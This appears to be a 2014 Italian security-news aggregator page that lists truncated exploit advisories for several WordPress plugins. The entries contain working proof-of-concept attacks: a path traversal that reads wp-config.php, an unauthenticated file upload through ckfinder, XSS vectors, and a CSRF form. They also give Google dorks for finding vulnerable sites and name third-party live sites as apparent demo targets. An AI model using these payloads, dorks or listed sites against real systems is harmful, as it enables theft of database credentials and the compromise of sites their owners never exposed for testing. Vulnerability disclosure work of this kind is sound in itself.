WordPress KenBurner Slider Arbitrary File Download

26 agosto 2014 - Fonte: http://www.mondounix.com
# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The Wordpress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
#...

Leggi il seguito »

WordPress All In One SEO Pack 2.2.2 Cross Site Scripting

20 agosto 2014 - Fonte: http://www.mondounix.com
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
 
ABOUT:
 
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. 
 
NOTE: User must have the ability to publish pages in the affected WordPress site.
 
POC:
 
http://localhost/wordpress/wp-admin/post.php?post_type=page
 
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0)...

Leggi il seguito »

WordPress CK-And-SyntaxHighLighter Arbitrary File Upload

14 agosto 2014 - Fonte: http://www.mondounix.com
[+] Title: Wordpress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-12
[+] Author: Hekt0r
[+] Tested on: Windows7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
###...

Leggi il seguito »

WordPress WhyDoWork AdSense 1.2 XSS / CSRF

4 agosto 2014 - Fonte: http://www.mondounix.com
###########################################################################################
# Exploit Title: WhyDoWork AdSense Plugin 1.2 - XSS and CSRF
# Date: 28 de Julio del 2014
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: https://wordpress.org/plugins/whydowork-adsense/
# Tested on: Win7 & Linux Mint
# Affected Version : 2.0.2 & Anteriores.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
 
Affected items - Archivos Afectados.
 
http://localhost/wordpress/wp-admin/options-general.php?page=whydowork_adsense&idcode=1[XSS
CODE]
 
Prueba de Concepto PoC:
Vector: "><svg/onload=alert(/Dylan/)>
 
Variable Afectada: $idx
Fix:...

Leggi il seguito »

WordPress Random Banner 1.1.2.1 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress random-banner.1.1.2.1 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/random-banner/
 
# Software Link :  
http://downloads.wordpress.org/plugin/random-banner.1.1.2.1.zip
 
# Date : 2014-06-28
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Vulnerable code :
 
<input placeholder="Link for that image"  type="text" size="25"  
name="buffercode_RBanner_url_banner1" value="<?php echo  
get_option('buffercode_RBanner_url_banner1') ?>" />
 
 
######################
 
Exploit...

Leggi il seguito »

WordPress Custom Banners 1.2.2.2 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress custom-banners 1.2.2.2 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/custom-banners/
 
# Software Link : http://downloads.wordpress.org/plugin/custom-banners.zip
 
# Date : 2014-06-28
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Vulnerable code :
 
<table class="form-table">
  <tr valign="top">
    <th scope="row"><label for="custom_banners_registered_name">Email  
Address</label></th>
    <td><input type="text" name="custom_banners_registered_name"...

Leggi il seguito »

WordPress Bannerman 0.2.4 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress bannerman.0.2.4 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/bannerman/
 
# Software Link : http://downloads.wordpress.org/plugin/bannerman.0.2.4.zip
 
# Date : 2014-06-27
 
# Tested on : Windows 7 / Mozilla Firefox
######################
 
# Location : http://localhost/wp-admin/options-general.php?page=bannerman
 
######################
 
Exploit Code:
 
<html>
<body>
<form name="post_form" action="http://localhost/wp-admin/options-general.php?page=bannerman" method="post">
<input type='hidden' name="bannerman_background"...

Leggi il seguito »

WordPress ml-slider 2.5 Cross Site Scripting

1 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress ml-slider 2.5 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/ml-slider
 
# Software Link : downloads.wordpress.org/plugin/ml-slider.2.5.zip
 
# Date : 2014-06-27
 
# Tested on : Windows 7 / Mozilla Firefox
######################
 
# Location : http://localhost/wp-admin/admin.php?page=metaslider&id=1[xss]
 
 
# Exploit:  
http://localhost/wp-admin/admin.php?page=metaslider&id=1"/><script>alert(1);</script>
 
#####################
 
Discovered By : ACC3SS
 
#####################

(4)

...

Leggi il seguito »

WordPress Simple Share Buttons Adder 4.4 CSRF / XSS

1 luglio 2014 - Fonte: http://www.mondounix.com
Details
================
Software: Simple Share Buttons Adder
Version: 4.4
Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/
Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-simple-share-buttons-adder/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:P)
 
Description
================
CSRF and stored XSS in Simple Share Buttons Adder 4.4
 
Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts.
 
 
Proof of concept
================
If a logged-in administrator user clicks...

Leggi il seguito »